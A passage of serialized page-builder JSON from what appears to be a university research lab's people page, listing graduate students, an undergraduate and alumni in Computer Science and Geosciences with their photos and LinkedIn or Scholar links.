Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c88\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c342\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c343\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c344\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c342\",\"index\":2,\"id\":\"182-c345\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c342\",\"index\":3,\"id\":\"182-c346\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c342\",\"index\":1,\"id\":\"182-c347\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c348\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c349\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c350\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c348\",\"index\":2,\"id\":\"182-c351\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c348\",\"index\":3,\"id\":\"182-c352\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c348\",\"index\":1,\"id\":\"182-c353\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c354\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c355\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c356\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c354\",\"index\":2,\"id\":\"182-c357\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c354\",\"index\":3,\"id\":\"182-c358\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c354\",\"index\":1,\"id\":\"182-c359\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c361\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c362\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c363\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c361\",\"index\":2,\"id\":\"182-c364\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c361\",\"index\":3,\"id\":\"182-c365\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c361\",\"index\":1,\"id\":\"182-c366\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c367\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c368\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c369\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c367\",\"index\":2,\"id\":\"182-c370\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c367\",\"index\":3,\"id\":\"182-c371\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c373\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c374\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c375\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c373\",\"index\":2,\"id\":\"182-c376\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c373\",\"index\":3,\"id\":\"182-c377\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c373\",\"index\":1,\"id\":\"182-c378\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c379\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c380\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c381\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c379\",\"index\":2,\"id\":\"182-c382\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c379\",\"index\":3,\"id\":\"182-c383\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c379\",\"index\":1,\"id\":\"182-c384\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c98\",\"parentId\":\"182-c97\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c97\",\"parentId\":\"182-c96\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c96\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c169\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c169\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c168\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c177\",\"parentId\":\"182-c176\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c176\",\"parentId\":\"182-c175\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c175\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c256\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c257\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c258\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c256\",\"index\":2,\"id\":\"182-c259\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c256\",\"index\":1,\"id\":\"182-c261\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c262\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c263\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c264\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c262\",\"index\":2,\"id\":\"182-c265\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c262\",\"index\":1,\"id\":\"182-c267\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c268\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c269\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c270\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c268\",\"index\":2,\"id\":\"182-c271\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c268\",\"index\":1,\"id\":\"182-c273\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c274\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c275\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c276\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c274\",\"index\":2,\"id\":\"182-c277\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c274\",\"index\":1,\"id\":\"182-c279\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c385\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c386\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c387\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c385\",\"index\":2,\"id\":\"182-c388\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c385\",\"index\":1,\"id\":\"182-c389\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c390\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c391\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c392\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c390\",\"index\":2,\"id\":\"182-c393\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c390\",\"index\":1,\"id\":\"182-c394\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c395\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c396\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c397\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c395\",\"index\":2,\"id\":\"182-c398\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c395\",\"index\":1,\"id\":\"182-c399\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c400\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c401\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c402\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c400\",\"index\":2,\"id\":\"182-c403\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c405\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c406\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c407\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c405\",\"index\":2,\"id\":\"182-c408\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 